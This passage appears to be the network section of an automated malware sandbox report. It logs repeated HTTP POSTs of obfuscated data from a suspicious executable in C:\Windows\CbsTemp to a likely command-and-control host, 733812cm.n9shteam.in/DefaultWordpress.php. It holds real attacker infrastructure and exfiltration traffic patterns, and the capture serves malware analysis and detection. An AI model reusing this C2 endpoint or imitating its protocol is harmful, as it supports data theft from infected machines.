                                                          Data Ascii: [ZY^__QPT[RWPRWRPY]_PRW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=*$89W+#?_0-S=>>'0;%2#X0:'-%+#F $P.
                                                          Oct 20, 2024 18:18:08.237895012 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:08.598839998 CEST  800  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXt1p%2BzzELTICcxOZCb0jk2%2FF%2F3l37t6TFRsoo%2BYXOv4%2FaakyhxCPJVQ4XK1g%2BPuEOKPrZBVnC504LdIk4KRk8696WES92fqrxGEwnuDFV03wWm7MQBu7ShsVT8L%2BEmO%2FbcuaMxs%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5270eaf79809-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12394&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129842&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          11  192.168.2.5  49838  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:08.738465071 CEST  311  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:09.088946104 CEST  2528  OUT  Data Raw: 5b 5d 59 5c 5a 5a 51 57 54 5b 52 57 50 5e 57 54 50 5a 5d 5f 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: []Y\ZZQWT[RWP^WTPZ]_PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]):2"((':+=<\)/0=_2%+9'"^(#F $P.4
                                                          Oct 20, 2024 18:18:09.524844885 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:09.781639099 CEST  796  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FmXxw%2F9CkT%2FHeJK4QZ3Am0D05mL3%2FFvLvQM7629PxTw6MR%2F%2BmuDHDtCFbZXx4Wmwhh8cxjURPqKFfPRHA3HubIsHfyQs9R19J%2FRaQJNXEF0wcDiIXXCTuZPW92cuy5T1itNsAWuTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5279088222d2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11828&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130005&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          12  192.168.2.5  49842  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:09.586019993 CEST  310  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:09.933116913 CEST  540  OUT  Data Raw: 5b 50 59 5f 5f 5d 51 55 54 5b 52 57 50 5d 57 57 50 5f 5d 5c 50 57 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PY__]QUT[RWP]WWP_]\PWWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \=1_$+<3((4=('+$!Y0='X*Y+:#F $P.
                                                          Oct 20, 2024 18:18:10.407501936 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:10.641581059 CEST  786  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcLX5UYsJWLojHM%2FPdPoEC%2F8BiciwckG96egiA5ZdzPZcQNVjGOJQBK0KWxLJK%2Bw2yMKYcOUnyWFuGLsSB7KhsWJVlgIlgqZj1DStAjXIx8dWwXHsz2gxsOZNMBvAU6wJAafqTAbRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a527e8cf6f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11163&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=130462&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:10.645262957 CEST  287  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:10.817346096 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:10.817724943 CEST  2528  OUT  Data Raw: 5e 58 59 5c 5f 58 51 53 54 5b 52 57 50 58 57 50 50 5a 5d 5e 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XY\_XQST[RWPXWPPZ]^PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#):%+&>04$86=>7=+&=32$8"X0-"^?#F $P.,
                                                          Oct 20, 2024 18:18:11.204118013 CEST  791  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJc2PNTt55lSO1Y4X6%2FSaMNWd32sSjo9aIdTG5aQq%2FYe9GZOBE0V3%2B3Bc%2FUnsNaXNdJ6UuYOUedXzstsq203GjlSJYOA2L2QQ5r0TESy6U3r0DeY459HDiKch55xi8Am4UI2mlAhbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52811f7ef967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11187&sent=6&recv=10&lost=0&retrans=0&sent_bytes=836&recv_bytes=3665&delivery_rate=257170&cwnd=39&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:11.204474926 CEST  322  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----GvMv93IGtr13jYgJ5FalRo73Vuj4HCErNX
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2978
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:11.378434896 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:11.378679991 CEST  2978  OUT  Data Raw: 2d 2d 2d 2d 2d 2d 47 76 4d 76 39 33 49 47 74 72 31 33 6a 59 67 4a 35 46 61 6c 52 6f 37 33 56 75 6a 34 48 43 45 72 4e 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------GvMv93IGtr13jYgJ5FalRo73Vuj4HCErNXContent-Disposition: form-data; name="0"Content-Type: text/plain^\Y__^QUT[RWP^WQPZ][PTWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:11.780561924 CEST  787  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ex7EBbs3ggPA4DEadTUFo27FsYsMOL2CpfzzIknpZjx5YJk70EEOluKen1%2BDGctmKa9IwarKo2BSyRvlSd8PfSvayckziT6QBfobfmStd6O3LRgBGOcEYu5aWEOtB3rsMmp3pbGcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52849a98f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11231&sent=11&recv=17&lost=0&retrans=0&sent_bytes=1652&recv_bytes=6965&delivery_rate=257170&cwnd=42&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:11.790975094 CEST  287  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:11.959316969 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:11.963150978 CEST  2528  OUT  Data Raw: 5b 5b 5c 5d 5f 59 51 56 54 5b 52 57 50 52 57 55 50 59 5d 5e 50 51 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\]_YQVT[RWPRWUPY]^PQW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>1[&]:< 7\'(.?.4= Z33^1!0+>[0:]+#F $P.
                                                          Oct 20, 2024 18:18:12.355777979 CEST  791  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orZmM6iJCShX3fjbIHsa33iigChOQBKAeJFXju87CMbcDBcbwlaFwQNs7pL6EUUCpTlqo1z3TR%2BIQe7waGzH8oPuTaxo%2FW78hM5Bdz1zNYaL82kE5Fc2Gqe0NCp81Z1Q%2Brcgvu3YLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52883e15f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11234&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2464&recv_bytes=9780&delivery_rate=257170&cwnd=43&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          13  192.168.2.5  49845  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:09.893937111 CEST  311  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:10.245141029 CEST  1924  OUT  Data Raw: 5b 5b 5c 58 5f 5a 51 50 54 5b 52 57 50 5f 57 55 50 5a 5d 5e 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\X_ZQPT[RWP_WUPZ]^P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ))Z1("(3;\'(?.4=?X3>/X&W?')%>5(#F $P.0
                                                          Oct 20, 2024 18:18:11.714519024 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:12.092942953 CEST  945  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzh4zVAiN%2BreDjfKkQbXhZW6%2BJvI1KrulClLU2pgEOTMhBq0QrJzAufy5iZRz%2FhMYhqTSLC6WnONTeIW7%2F68whNV9mYH3UtrZmNnMO%2FthFtmEuHv0OUMiSZ%2FcGNx7T6qi1BV%2BXolEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5286a83b2513-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11313&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2235&delivery_rate=130438&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 5b 27 11 23 51 3d 06 30 10 2e 58 3e 0f 39 2e 2b 19 39 31 21 14 30 0d 03 05 25 5c 3d 58 32 33 2c 03 22 2c 00 59 23 3f 29 10 2d 0c 28 5e 07 12 26 10 28 02 37 06 2b 2d 09 07 3f 38 2b 01 21 34 33 09 25 5b 3b 1c 27 2d 32 00 3e 0f 2d 5b 3d 2d 26 1c 2c 24 08 1b 2e 28 0e 5b 37 2a 22 53 03 13 25 10 29 0e 20 11 36 0c 11 58 2b 2e 3f 58 2b 3b 2e 58 3e 33 20 04 2b 28 2b 12 38 03 26 5a 24 11 05 03 26 06 28 5d 25 2a 30 09 24 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&['#Q=0.X>9.+91!0%\=X23,",Y#?)-(^&(7+-?8+!43%[;'-2>-[=-&,$.([7*"S%) 6X+.?X+;.X>3 +(+8&Z$&(]%*0$$^-/W6[O0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          14  192.168.2.5  49853  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:12.492455959 CEST  287  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:12.838970900 CEST  2528  OUT  Data Raw: 5b 51 5c 53 5f 5e 54 57 54 5b 52 57 50 53 57 51 50 5f 5d 58 50 5d 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\S_^TWT[RWPSWQP_]XP]W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ^)3=Y1T>3]&(!<(]=?/&=;_&!$'\':_(#F $P.
                                                          Oct 20, 2024 18:18:13.311400890 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:13.681202888 CEST  790  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wuok4hq6DtH0soMtEomz9K%2Bz0fDJMPplz1CkwicgVpYZiLBamxEAD1BU0MzdG1seek7u2aPcs%2F3AP2SvZ%2FNelF8uULjIxTkiy8zH3iT2%2Bug66vBlGB6u9CYO92Sw0mgUBUG7aOqWKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5290aaf32368-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13007&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112161&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          15  192.168.2.5  49858  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:13.813910007 CEST  311  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:14.166963100 CEST | 2528 | OUT | Data Raw: 5b 59 5c 5f 5a 5f 54 51 54 5b 52 57 50 58 57 5d 50 5a 5d 5a 50 5d 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\_Z_TQT[RWPXW]PZ]ZP]W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \>32;%(;[3(1R?.,>Y(]$'&W+'*\$="_(*#F $P.,
                                                          Oct 20, 2024 18:18:14.617961884 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:14.991956949 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S2sqOFtht1Objkq8MHyx69VOQc0BBApMPMKM7ya8p7GCIQkzKA%2BubHHEoUwEJ8QIFFVBoN61YNckBIsKwN7sdrFQPL2aGKo0Ij0JJTJ3q6veq2yzwrNXDfDXXBHzd1LxlM%2BuAp9QmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5298d8339456-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11991&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=122132&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.5 | 49862 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:15.130748987 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2516
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:15.479419947 CEST | 2516 | OUT | Data Raw: 5b 5a 59 5c 5a 58 54 55 54 5b 52 57 50 5a 57 54 50 51 5d 58 50 56 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZY\ZXTUT[RWPZWTPQ]XPVWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(3>&+.(_$R<8Y>$[<&#Z$2[0.<#F $P.
                                                          Oct 20, 2024 18:18:15.914083958 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:16.508117914 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NLwCorUAinjxlpuY35P0%2FEAxnU9Czmw64S6kiF1AXZr8G01x%2Bg0MhG96CuPy9%2By2E2H6UhEirFdXJ4AeGVomWLDZW9rgYo3%2Bw82pwuATYSGQffP4PUZKP41q9qy4tIP9B6XWWgnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52a0eff4cf4d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11741&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=116025&cwnd=54&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:16.537457943 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:16 GMT
